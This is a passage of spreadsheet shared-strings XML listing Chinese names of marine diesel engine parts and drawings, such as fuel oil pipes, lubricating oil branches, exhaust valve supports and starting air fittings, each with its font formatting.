      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端接线箱连接图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角接触</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气进管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀保持螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接法兰装配</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴管端盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴管衬套导管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器导轨</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉拔工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧下部支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架焊接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧中层走台</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧下层走台</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀支撑布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板盖环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀支撑环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地面格栅</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停活塞阀梁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>承压梁</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功凸轮的防护罩</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护罩</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角度连接板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带框架的格栅支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑动法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方垫</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护列表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>长推力轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉拔螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滴油盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滴油盘支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块提升横梁</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄油装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸部分支管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>污油回油箱出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>到污油盘的泄放管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖泄放管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵泄放</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输送管盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸部分管夹</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油连接布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油仪表安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺口插座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挠性软管盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管备件图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑阀壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔板壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>样本</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压燃油管磨削工具接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰护罩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>改进蝶阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑油主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油底壳滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体泄放管支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气排泄管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气集管泄放管支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油管支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口管支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏油螺塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套滑油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂滑油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调压阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油管护套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油过滤器进口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油过滤器悬挂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>I</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手轮泵支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手轮泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒温阀进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器滑油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器出口压力</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机滑油进油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油布置图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气管螺柱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气进口堵头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器控制空气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
